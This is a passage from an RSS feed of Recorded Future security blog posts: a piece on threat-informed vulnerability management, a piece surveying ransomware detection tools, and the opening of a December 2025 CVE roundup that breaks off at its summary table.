          <li>PurpleBravo’s heavy targeting of the IT and software development industries in South Asia presents an overlooked and acute supply-chain risk to organizations that contract or outsource their IT services work.</li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1bf59fb2748dede14af5b52ad8cb001808918b07e.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Threat and Vulnerability Management in 2026]]></title>
            <link>https://www.recordedfuture.com/ko/blog/threat-and-vulnerability-management</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/threat-and-vulnerability-management</guid>
            <pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Understand the future of threat and vulnerability management (TVM). Learn what TVM is, why traditional tools fail, and how intelligence is essential in today’s landscape.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways:</h2>
        <ul>
          <li><strong>Traditional vulnerability management tools can no longer keep up</strong> with the speed of modern exploitation—threat context is now mandatory.</li>
          <li><strong>Threat and Vulnerability Management (TVM) systems</strong> unify asset discovery, vulnerability data, and real-time external threat intelligence to prioritize real risk.</li>
          <li><strong>Static CVSS scores fail to reflect exploitation likelihood</strong>; intelligence-driven, dynamic risk scoring is essential in 2026.</li>
          <li><strong>Organizations that integrate vulnerability intelligence and attack surface intelligence reduce remediation time and security waste</strong>, enhancing detection and remediation while reducing alert fatigue.</li>
        </ul>
        <h2>Why Threat and Vulnerability Management Must Evolve in 2026</h2>
        <p>Security teams currently find themselves at a crossroads. Year over year, CVE volumes continue to surge higher and higher. Exploitation is faster, more automated, and more targeted, meaning attacks are growing in volume, velocity, and sophistication alike. As a result, security teams are expected to “patch faster” with fewer resources and can no longer realistically keep up with this ever-rising tide of threats.</p>
        <p>Thanks to these forces, security teams have found themselves in a state of affairs in which vulnerability management has become an exercise in sheer volume, not risk. Day in and day out, teams are overwhelmed by alerts that lack real-world context, making it all but impossible to assess the actual degree of risk.</p>
        <p>Thankfully, there is a solution. Threat-informed vulnerability management (TVM) has emerged to counteract this trend, enabling security teams to intelligently address weaponized vulnerabilities, zero-day exploits, and supply chain and cloud-native risk. All this comes along with much-needed relief from creeping alert-fatigue.</p>
        <p>In 2026, effective cybersecurity programs will be defined not by how many vulnerabilities they detect but by how precisely they understand, prioritize, and neutralize real threats using <a href="https://www.recordedfuture.com/ko/threat-intelligence">intelligence-driven TVM systems</a>.</p>
        <h2>The Core Problem: Alert Fatigue and Prioritization Failure</h2>
        <p>As it stands today, the explosion in disclosed vulnerabilities (CVEs) has outpaced humans’ abilities to triage and manage patching effectively. Today, the vast majority of organizations are incapable of remediating more than a fraction of the total identified issues affecting the ecosystem.</p>
        <p>Traditionally, using a standard CVSS (Common Vulnerability Scoring System) was enough to overcome these <a href="https://www.recordedfuture.com/ko/blog/addressing-the-vulnerability-prioritization-challenge">challenges of prioritization</a>. CVSS is an open, standardized framework used to assess the severity of security vulnerabilities by assigning a numerical score based on factors like exploitability, impact, and scope. Organizations use CVSS scores to prioritize remediation and compare vulnerabilities consistently across systems and vendors.</p>
        <p>However, CVSS only measures theoretical severity, not exploitation likelihood. It misses critical pieces of context for prioritization decisions such as:</p>
        <ul>
          <li>Is exploit code available?</li>
          <li>Is the vulnerability actively exploited?</li>
          <li>Are threat actors discussing or operationalizing it?</li>
        </ul>
        <p>As a result, high-severity CVEs that pose little real-world risk continue to consume time and resources, leading us back once again to the issue of alert fatigue and the inability to effectively triage and patch the most pressing vulnerabilities.</p>
        <p>At the same time, we are seeing modern organizations struggle with a “silo problem,” in which security, IT, and CTI (cyber threat intelligence) teams operate independently and with limited visibility and collaboration between one another. In many organizations, each of these teams ends up using different tools, establishing different priorities, sharing findings infrequently if at all, and adopting entirely different “risk languages” through which they understand, prioritize, and address threats.</p>
        <p>Taken broadly, this leaves organizations woefully lacking a unified, intelligence-driven view of risk. Without this, many adopt a de facto policy of “patch everything”. And it comes with significant costs, including:</p>
        <ul>
          <li>Operational drag and burnout</li>
          <li>Delayed remediation of truly dangerous vulnerabilities</li>
          <li>Increased business risk despite increased effort</li>
          <li>Fractured security operations</li>
        </ul>
        <p>Both individually, and in the aggregate, these side-effects come at a significant detriment to organizational security. And as the number and diversity of CVEs continues to expand, the greater that cost becomes. Moving forward, organizations must find a better way.</p>
        <h2>The Evolving Threat Landscape Demands a New Approach</h2>
        <p>Today’s ever-changing landscape means that organizations must evolve along with it or risk falling dangerously behind. The rise of rapidly weaponized vulnerabilities (i.e., known software weaknesses that have moved beyond disclosure and into active attacker use) reflects a fundamental shift in how quickly and deliberately adversaries turn CVEs into operational threats. Today, the gap between disclosure, proof-of-concept release, and active exploitation has collapsed from months to days (or even hours), driven largely by exploit marketplaces, automated scanning, and widely shared tooling.</p>
        <p>Attackers increasingly prioritize vulnerabilities that are easy to exploit, broadly applicable across cloud services, edge devices, and common dependencies, and capable of delivering fast returns. Once weaponized, these vulnerabilities manifest not as theoretical risk but as active intrusion campaigns, ransomware operations, and opportunistic internet-wide exploitation, making threat context essential for distinguishing true danger from background noise.</p>
        <p>At the same time that weaponization is accelerating, attack surfaces are expanding. The average attack surface today is expanding and fragmenting across hybrid and multi-cloud environments, all of which is worsened by SaaS sprawl, shadow IT, and third-party and supply chain exposure. In this environment, it is absolutely critical that security teams have a clear understanding of vulnerabilities vs. threats, and work to establish an <a href="https://www.recordedfuture.com/ko/blog/threat-intelligence-and-vulnerability-management">integrated approach</a> between the two.</p>
        <p>In short, a vulnerability is a technical weakness, while a threat is an actor, campaign or event at work exploiting that weakness. In order to be truly effective, modern threat vulnerability management (TVM) systems must merge both concepts to reflect real risk and separate signal from noise.</p>
        <h2>What Is Threat and Vulnerability Management (TVM)?</h2>
        <p>Threat and Vulnerability Management (TVM) — also called Threat-Informed Vulnerability Management — is a continuous, intelligence-driven process that prioritizes remediation based on three core variables:</p>
        <ul>
          <li>Active exploitation</li>
          <li>Threat actor behavior</li>
          <li>Asset criticality</li>
        </ul>
        <p>TVM differs from traditional vulnerability management (VM) in a number of critical ways. Traditional VM relies on periodic scans, static severity scoring, and a largely reactive patching process. TVM, on the other hand, employs continuous monitoring, external threat intelligence enrichment, and close-loop remediation and validation.</p>
        <p>This continuous, context-rich approach is foundational for modern security programs. Rather than inundating security teams with decontextualized CVEs and indiscriminate patching, modern TVM systems align security efforts with attacker reality. Reactive patching is replaced with proactive, risk-based decision-making, and as a result, organizations are able to reduce noise while simultaneously increasing the impact of their security operations.</p>
        <h2>The Five Core Pillars of Modern TVM Systems</h2>
        <p>As the speed and breadth of today’s threats continue to grow, traditional VM, being fundamentally reactive in nature, is no longer enough to keep up. In a world where vulnerabilities are exposed by the day, TVM offers much-needed efficiency, intelligence, and proactiveness. However, not all TVM systems are created equally. Here are five core pillars of effective modern TVM systems to help you evaluate and assess solutions on the market.</p>
        <p><strong>1. Continuous Asset Discovery &amp; Inventory</strong></p>
        <p>Modern TVM systems are invaluable in that they provide full visibility across the entirety of an organization’s growing and fragmented attack surface. This includes external-facing assets, shadow IT, and cloud and SaaS environments alike. By providing continuous asset discovery and a timely, up-to-date inventory of one’s assets, TVM systems allow for real-time, comprehensive, attack-surface management.</p>
        <p>Remember, you can’t defend what you can’t see. That’s why attack surface management (ASM) is a prerequisite for effective TVM. Without accurate, up-to-date asset inventories, vulnerability data is incomplete and misleading. Continuous discovery ensures defenders see their environment the way attackers do.</p>
        <p><strong>2. Vulnerability Assessment &amp; Scoring</strong></p>
        <p>TVM goes beyond internal scanning tools to identify vulnerabilities exposed to the internet and reassess them continuously as environments change. This includes tracking misconfigurations, outdated services, and newly introduced exposure, not just known CVEs.</p>
        <p><strong>3. External Threat Context Enrichment</strong></p>
        <p>This is where TVM fundamentally diverges from legacy approaches. External threat intelligence enriches vulnerability data with insight from dark web and criminal forums, exploit marketplaces, malware telemetry, and active attack campaigns.</p>
        <p>Vulnerabilities are mapped to known threat actors, active exploitation, and <a href="https://attack.mitre.org/">MITRE ATT&amp;CK®</a> techniques, ultimately transforming raw findings into actionable intelligence.</p>
        <p><strong>4. Risk-Based Prioritization (RBVM)</strong></p>
        <p>Risk-based vulnerability management prioritizes issues based on the probability of exploitation, asset importance, and threat actor interest. This shifts the focus from “most severe” to “most dangerous,” enabling teams to address the vulnerabilities that pose the greatest immediate risk to their organizations.</p>
        <p><strong>5. Automated Remediation &amp; Verification</strong></p>
        <p>Modern TVM integrates directly with IT and SecOps workflows, pushing prioritized findings into ticketing and automation platforms. Just as importantly, it verifies remediation to confirm that patches were applied and exposure was actually reduced, creating a continuous feedback loop.</p>
        <p>These five pillars of effective TVM systems come together to create a whole that is greater than the sum of its parts. These systems, unlike their predecessors, are designed to continuously monitor and triage real threats and vulnerabilities in context and ensure awareness and proactive mitigation without the risk of burn-out and alert fatigue.</p>
        <h2>Stop Patching Everything — Use Intelligence to Prioritize Real Risk</h2>
        <p>The scale of the CVE problem is overwhelming. Tens of thousands of vulnerabilities are disclosed each year, yet only a small fraction are ever exploited in the wild. Treating them all as equally urgent is not just inefficient — it’s dangerous.</p>
        <p>Vulnerability intelligence changes the equation by tracking a CVE across its full lifecycle, from initial disclosure to weaponization, exploitation, and criminal adoption. This enables dynamic risk scoring that reflects real-world conditions rather than static assumptions.</p>
        <p>Dynamic risk scoring incorporates evidence of active exploitation, availability of exploit code, dark web chatter, and threat actor interest. As conditions change, so does the risk score, ensuring prioritization remains aligned with attacker behavior.</p>
        <p>The operational impact is significant. Security teams can focus remediation on the top 1% of vulnerabilities that pose immediate risk, respond faster, reduce operational cost, and strengthen overall security posture.</p>
        <h2>See Your Risk Like an Attacker: The Full Attack Surface View</h2>
        <p>In today’s threat landscape, security teams must recast the way they envision their roles. Rather than operating in a reactive, defensive manner at all times, security teams should think more like their adversaries, taking a complete view of their attack surface and leveraging modern tools and technologies to ensure intelligent, prioritized defenses. The following three key concepts will help you take on that mentality.</p>
        <ol>
          <li><strong>The Visibility Gap:</strong> Unknown assets create unknown risk. Traditional scanners often miss orphaned domains, misconfigured cloud services, and forgotten infrastructure — precisely the assets attackers look for first.</li>
          <li><strong>Attack Surface Intelligence Explained:</strong> Attack surface intelligence provides continuous mapping of domains, IPs, cloud assets, and external services. It identifies exposures attackers see before defenders do, enabling proactive remediation rather than reactive cleanup.</li>
          <li><strong>Connecting the Dots with Vulnerability Tools:</strong> When integrated with vulnerability scanners like Qualys and Tenable, attack surface intelligence provides a unified, prioritized view of exposure. Intelligence-driven platforms serve as a single source of truth for risk decisions, enabling teams to connect vulnerabilities to real-world exposure and threat activity.</li>
        </ol>
        <h2>Three Strategic Recommendations for Security Leaders</h2>
        <p>Most organizations remain behind the curve in threat and vulnerability management. Knowing what we know now, there are three strategic steps security leaders can take to reclaim control.</p>
        <p><strong>1. Bridge the Gap Between Security and IT</strong></p>
        <p>Establish a shared, intelligence-driven risk language. Align SLAs with real-world risk rather than raw severity scores, ensuring remediation efforts focus on what matters most.</p>
        <p><strong>2. Embrace Automation and Workflow Integration</strong></p>
        <p>Push prioritized findings directly into platforms like ServiceNow and SOAR tools. Reducing manual handoffs accelerates remediation and minimizes delays.</p>
        <p><strong>3. Measure What Matters — Time-to-Remediate (TTR)</strong></p>
        <p>Shift KPIs toward time-to-remediate actively exploited vulnerabilities and reduction in exposure windows. These metrics demonstrate real ROI and security impact.</p>
        <h2>The Path Forward Is Threat-Informed: Strengthen Your Threat and Vulnerability Strategy</h2>
        <p>Volume-based vulnerability management is no longer viable. As we progress through 2026, threat context is not optional. It is foundational.</p>
        <p>Future-ready security programs are intelligence-led, automation-enabled, and attacker-aware. Recorded Future sits at the center of this shift, providing the intelligence backbone required to move from reactive patching to proactive risk reduction.</p>
        <p>Explore how Recorded Future Vulnerability Intelligence and Attack Surface Intelligence can help your organization transition from alert-driven vulnerability management to intelligence-driven risk reduction.</p>
        <p>By unifying threat intelligence, vulnerability data, and attack surface visibility, organizations can reduce alert fatigue, prioritize what truly matters, and proactively harden defenses against real-world threats before attackers exploit them.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the primary difference between a Vulnerability and a Threat?</h3>
              <p>A Vulnerability is a weakness or flaw in an asset (e.g., unpatched software, misconfiguration) that could be exploited. A Threat is a person, group, or event (e.g., a threat actor, a piece of malware) that has the potential to exploit that vulnerability to cause harm.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the biggest challenge facing traditional vulnerability management programs today?</h3>
              <p>The biggest challenge is alert fatigue and prioritization noise. Traditional programs generate an overwhelming number of vulnerabilities, often relying only on the technical severity score (like CVSS). This leads security teams to waste time patching low-risk flaws while critical, actively exploited vulnerabilities remain unaddressed.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Why is integrating external threat intelligence mandatory for TVM in 2026?</h3>
              <p>External threat intelligence provides real-time context on the threat landscape. These days, it’s mandatory because it allows security teams to identify which vulnerabilities are being actively exploited in the wild, have associated proof-of-concept (PoC) code, or are being discussed on the dark web, enabling true risk-based prioritization.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future Vulnerability Intelligence help with prioritization?</h3>
              <p>Recorded Future Vulnerability Intelligence automatically assigns a dynamic Risk Score to every CVE by correlating it with real-time threat intelligence from across the internet, including evidence of active exploitation, malware associations, and dark web chatter. This lets teams instantly know if a vulnerability is a theoretical risk or an immediate, active threat requiring urgent attention.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is Attack Surface Intelligence, and what role does it play in TVM?</h3>
              <p>Attack Surface Intelligence is the continuous process of identifying and monitoring all external-facing assets of an organization (like public IPs, domains, and cloud services). In TVM, it is crucial to ensure that vulnerabilities are not just identified on known assets, but also on shadow IT and unknown exposed systems that are most likely to be targeted by adversaries.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does the TVM lifecycle differ from the traditional vulnerability management lifecycle?</h3>
              <p>While both involve Discovery, Assessment, and Remediation, the TVM lifecycle adds an explicit Threat Analysis step before prioritization. The modern TVM cycle is typically:</p>
              <ul>
                <li>Identify Assets</li>
                <li>Scan for Vulnerabilities</li>
                <li>Enrich with Threat Context</li>
              </ul>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1db30163db7f6aa5dca641559f3f07e312ffaeda4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Best Ransomware Detection Tools]]></title>
            <link>https://www.recordedfuture.com/ko/blog/best-ransomware-detection-tools</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/best-ransomware-detection-tools</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Stop ransomware before encryption begins. Learn how intelligence-driven detection tools can help identify precursor behaviors and reduce false positives for faster response.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li>Effective ransomware detection requires three complementary layers: endpoint and extended detection and response (EDR/XDR) to monitor device-level activity, network detection and response (NDR) to catch lateral movement, and threat intelligence tools to provide context that enables efficient prioritization.</li>
          <li>The most valuable detection happens before ransomware encryption begins. Tools must identify precursor behaviors like reconnaissance, credential theft, and data staging rather than waiting for known indicators of compromise.</li>
          <li>Intelligence quality determines detection quality: even sophisticated security tools require real-time threat data about active ransomware campaigns, attacker infrastructure, and current tactics, techniques, and procedures (TTPs) to distinguish genuine threats from noise.</li>
          <li>Recorded Future strengthens the entire detection stack by providing organization-specific threat intelligence, early detection capabilities (in some cases, identifying victims up to 30 days before public extortion), and vulnerability intelligence focused on what ransomware groups are actively exploiting.</li>
        </ul>
        <h2>Introduction</h2>
        <p>The ransomware playbook has fundamentally changed. Instead of casting wide nets with opportunistic phishing campaigns, attackers now focus on big-game hunting: targeting high-value enterprises with data theft and double or triple extortion tactics. Threat actors purchase pre-compromised access from brokers, exploit newly disclosed vulnerabilities within hours, and use automation to compress weeks-long campaigns into days.</p>
        <p>The results are stark. Ransomware now appears in 44% of breaches, up from 32% the prior year, according to the <a href="https://www.verizon.com/business/resources/Ta64/reports/2025-dbir-data-breach-investigations-report.pdf">2025 Verizon Data Breach Investigations Report</a>. Traditional signature-based detection tools often can't keep pace because ransomware groups continuously rotate their infrastructure, modify malware variants, and adopt new tactics faster than defenses can update. By the time a signature is written, the threat has already evolved.</p>
        <p>This gap has created demand for a different approach: intelligence-driven ransomware detection. Rather than waiting for known indicators of compromise, these tools identify the precursor behaviors that happen before encryption (e.g. reconnaissance, credential theft, lateral movement, privilege escalation, and data staging).</p>
        <p>The key is continuous external intelligence that maps what's happening in your environment to active campaigns and specific ransomware families operating in the wild.</p>
        <p>The most effective defense combines three layers: endpoint and extended detection and response (EDR/XDR) to catch suspicious behaviors on devices, network detection and response (NDR) with deception technology to spot lateral movement, and threat intelligence tools that provide the real-time context tying it all together. When these tools share a common intelligence foundation, they can reveal malicious intent well before encryption begins.</p>
        <h2>The Ransomware Detection Tool Landscape: Three Pillars of Defense</h2>
        <p>Effective ransomware detection generally requires three complementary tool categories, each targeting different stages of an attack.</p>
        <h3>1. Endpoint and Extended Detection and Response (EDR/XDR) Tools</h3>
        <p>EDR and XDR platforms form the first line of defense, monitoring individual devices and user activity for signs of compromise.</p>
        <p><strong>Core Functionality</strong></p>
        <p>EDR and XDR solutions monitor endpoints for suspicious behaviors like privilege escalation, credential dumping, unusual process creation, and bulk file modifications. When they detect threats, these tools automatically isolate devices, roll back changes, and contain threats, cutting response time from hours to seconds.</p>
        <p><strong>How Threat Intelligence Enhances EDR/XDR</strong></p>
        <p>Threat intelligence connects endpoint activity to active campaigns in the wild. When an EDR tool flags suspicious activity, intelligence context reveals whether it matches known campaigns from groups like LockBit, ALPHV/BlackCat, or BlackBasta. This can dramatically reduce false positives by distinguishing unusual-but-legitimate administrative work from activity aligned with active ransomware operations.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>CrowdStrike Falcon</strong> delivers strong behavioral detection capabilities tied to comprehensive actor profiling. The platform's threat graph continuously correlates endpoint telemetry with global threat intelligence, enabling rapid identification of ransomware precursors.</li>
          <li><strong>Microsoft Defender XDR</strong> integrates telemetry across identity systems, endpoints, email, and cloud applications. This unified visibility helps security teams identify cross-domain attack patterns that indicate ransomware preparation, such as credential theft followed by lateral movement.</li>
          <li><strong>SentinelOne</strong> employs behavioral AI to detect malicious activity and offers automated rollback features that can reverse ransomware encryption and file modifications, effectively restoring systems to their pre-attack state.</li>
        </ul>
        <h3>2. Network Detection and Response (NDR) Tools</h3>
        <p>While EDR focuses on individual endpoints, NDR tools monitor the network layer to catch attackers as they move between systems.</p>
        <p><strong>Core Functionality</strong></p>
        <p>NDR platforms watch internal network traffic to catch attackers moving laterally, scanning for targets, or accessing resources they shouldn't. The more advanced versions include deception technology like honeypots, fake credentials, and decoy systems that look like attractive targets. When attackers interact with these decoys during reconnaissance, security teams get early warnings before any real damage occurs.</p>
        <p><strong>How Threat Intelligence Improves NDR and Deception</strong></p>
        <p>Threat intelligence helps organizations customize deception environments based on active ransomware groups in their industry. When NDR tools spot anomalies such as unusual file sharing, unexpected queries, or abnormal transfers, intelligence matches these to current attack techniques, distinguishing administrative work from reconnaissance patterns before data staging begins.</p>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Vectra AI</strong> specializes in detecting lateral movement and privilege misuse by correlating network behaviors with active attacker tradecraft. The platform's AI-driven detection identifies subtle deviations from normal network patterns that indicate ransomware reconnaissance.</li>
          <li><strong>ExtraHop Reveal(x)</strong> provides real-time network visibility that identifies reconnaissance activity and command-and-control (C2) communications. The platform's deep packet inspection capabilities reveal malicious traffic even when encrypted or obfuscated.</li>
          <li><strong>Illusive (now part of Zscaler)</strong> deploys deception technology specifically tuned to adversary behaviors. The platform's decoys and fake credentials create a minefield for attackers, triggering high-confidence alerts when threat actors interact with deception assets.</li>
        </ul>
        <h3>3. Threat Intelligence Tools</h3>
        <p>The third pillar provides the context that makes endpoint and network detection tools more accurate and actionable.</p>
        <p><strong>Core Functionality</strong></p>
        <p>Threat intelligence tools pull together global threat data from sources like dark web forums, malware repositories, scanning activity, and criminal infrastructure. They enrich alerts from your other security tools with context about who's behind an attack, which campaign it's part of, and what techniques the attackers are likely to use next.</p>
        <p><strong>How Threat Intelligence Strengthens Ransomware Detection</strong></p>
        <p>These tools deliver several critical capabilities that transform how security teams identify and respond to ransomware threats:</p>
        <ul>
          <li><strong>Threat Mapping:</strong> Identifies whether your organization matches the targeting profile of active ransomware groups based on your industry, size, region, and technology stack. Specific operators are mapped using their TTPs to determine the intent and opportunity of carrying out a successful attack against your business.</li>
          <li><strong>Infrastructure Tracking:</strong> Monitors ransomware operators' continuous infrastructure shifts in real-time, identifying new C2 servers, drop sites, and payment infrastructure as they emerge.</li>
          <li><strong>Variant Identification:</strong> Rapidly analyzes and disseminates indicators when ransomware groups release new malware variants, enabling detection before signature-based systems receive updates.</li>
          <li><strong>Exploitation Intelligence:</strong> Identifies specific CVEs and misconfigurations that attackers are actively weaponizing, moving vulnerability management from severity-score-driven to threat-driven prioritization.</li>
          <li><strong>Risk Scoring:</strong> Provides real-time scores combining multiple intelligence signals—indicator prevalence, campaign association, TTP alignment—to guide analysts toward genuine threats rather than generic suspicious activity.</li>
        </ul>
        <p><strong>Example Tools</strong></p>
        <ul>
          <li><strong>Recorded Future</strong> delivers organization-specific threat intelligence powered by The Intelligence Graph and proprietary AI. The platform provides end-to-end visibility into exposures, while research from its Insikt Group enables early detection of ransomware activity, identifying potential victims up to 30 days before public extortion.</li>
          <li><strong>Flashpoint</strong> specializes in deep and dark web intelligence, monitoring criminal forums, marketplaces, and chat channels where ransomware operators communicate, recruit, and trade access. This visibility into adversary communities provides early warnings about emerging threats and campaigns.</li>
          <li><strong>Google Threat Intelligence (formerly Mandiant)</strong> combines frontline incident response insights with global threat tracking. The platform leverages intelligence from breach investigations to identify ransomware group behaviors and attack patterns as they emerge.</li>
        </ul>
        <h2>Choosing the Right Ransomware Detection Tools</h2>
        <p>Security leaders must distinguish between tools that reduce ransomware risk and those that add noise. The most effective tools share several characteristics.</p>
        <p><strong>Security leaders should prioritize:</strong></p>
        <ul>
          <li><strong>Pre-encryption visibility:</strong> Detect credential misuse, suspicious access, and lateral movement during reconnaissance and preparation phases when interventions are most effective.</li>
          <li><strong>Context-rich alerts:</strong> Alerts should include TTPs, infrastructure associations, and known actor activity and explain not just what triggered an alert but why it matters.</li>
          <li><strong>Integration maturity:</strong> Smooth data flow into SIEM, SOAR, and existing investigation workflows without creating siloed intelligence or blind spots.</li>
          <li><strong>Operational efficiency:</strong> Tools should reduce alert noise, not add to it, decreasing time-to-detection and time-to-response.</li>
          <li><strong>Relevance:</strong> Intelligence must map to current campaigns. Generic or stale indicators waste analyst time and create false confidence.</li>
          <li><strong>Scalability:</strong> Handle hybrid environments spanning on-premises infrastructure, multiple cloud providers, and remote endpoints without performance degradation.</li>
        </ul>
        <h2>How Recorded Future Enables Early Ransomware Detection</h2>
        <p>The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing <a href="https://www.recordedfuture.com/ko/blog/reduce-alert-fatigue">alert fatigue</a> draining analyst time on false positives instead of credible threats.</p>
        <p>Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.</p>
        <h3>Real-Time Relevance Through <a href="https://www.recordedfuture.com/ko/products/secops-intelligence">SecOps Intelligence</a></h3>
        <p>Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.</p>
        <h3>Proactive Mitigation Through Vulnerability Intelligence</h3>
        <p>Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.</p>
        <p>The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.</p>
        <h3>Victimology and Anticipation</h3>
        <p>Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.</p>
        <p>This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.</p>
        <h2>Shifting From Reactive Response to Intelligence-Led Prevention</h2>
        <p>No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.</p>
        <p>Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.</p>
        <div>
          <div>
            <div>
              <h2>Frequently Asked Questions</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>Can behavioral analytics alone stop zero-day ransomware variants?</h3>
              <p>While powerful, behavioral analytics alone cannot guarantee a stop to a true zero-day ransomware variant. It excels at detecting malicious behavior (like mass file encryption or privilege escalation), even from unknown malware. The most effective defense is a combination of behavioral analytics, up-to-the-minute threat intelligence on emerging TTPs, and controlled execution (sandboxing).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the most common weakness of signature-based ransomware detection methods today?</h3>
              <p>The primary weakness is their reactive nature. Signature-based tools only detect known threats—they require a threat to be analyzed and its signature created before they can flag it. They are easily bypassed by polymorphic ransomware or customized, novel variants that threat actors create to evade detection.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can Recorded Future's SecOps Intelligence Module help my existing EDR/XDR tool detect ransomware faster?</h3>
              <p>Recorded Future's SecOps Intelligence Module ingests and correlates massive amounts of external threat data. It directly integrates with your existing EDR/XDR tools, enriching alerts with real-time context (Risk Scores, actor TTPs, associated malware). This helps your existing tools move beyond basic indicators, prioritize critical alerts, and automatically initiate responses before a potential ransomware event escalates.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future provide victimology data to anticipate ransomware attacks targeting my industry?</h3>
              <p>Recorded Future's <a href="https://www.recordedfuture.com/ko/products/threat-intelligence">Threat Intelligence Module</a> provides crucial victimology and actor insights. It monitors real-time chatter on the dark web and forums to identify specific ransomware groups, their infrastructure, and the industries or regions they are planning to target next. This allows you to prioritize defenses based on pre-attack relevance.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>Is a dedicated deception technology platform considered a primary ransomware detection tool?</h3>
              <p>Deception technology is not a primary prevention tool, but it is an extremely effective early detection tool. It places fake assets (honeypots, fake credentials) within the network. When an attacker, particularly ransomware moving laterally, interacts with a decoy, it immediately triggers a high-fidelity alert, providing security teams with crucial seconds to isolate the endpoint and stop the attack before encryption begins.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_195c3ebf5f4567c5e03d5fb20c8916aafc7cfb0e3.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[December 2025 CVE Landscape: 22 Critical Vulnerabilities Mark 120% Surge, React2Shell Dominates Threat Activity]]></title>
            <link>https://www.recordedfuture.com/ko/blog/december-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/december-2025-cve-landscape</guid>
            <pubDate>Tue, 13 Jan 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[December 2025 saw a 120% surge in critical CVEs, with 22 exploited flaws and React2Shell (CVE-2025-55182) dominating threat activity across Meta’s React framework.]]></description>
            <content:encoded><![CDATA[
        <p>December 2025 witnessed a dramatic 120% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>22 vulnerabilities</strong> requiring immediate remediation, up from 10 in November. The month was dominated by widespread exploitation of Meta's React Server Components flaw.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>React2Shell pandemonium:</strong> CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families</li>
          <li><strong>China-nexus exploitation intensifies:</strong> Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations</li>
          <li><strong>Public exploits proliferate:</strong> Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines</li>
          <li><strong>Legacy vulnerabilities resurface:</strong> CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps</li>
        </ul>
        <p><strong>Bottom line:</strong> December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.</p>
        <h2>Quick Reference Table</h2>
        <p><em>All 22 vulnerabilities below were actively exploited in December 2025.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
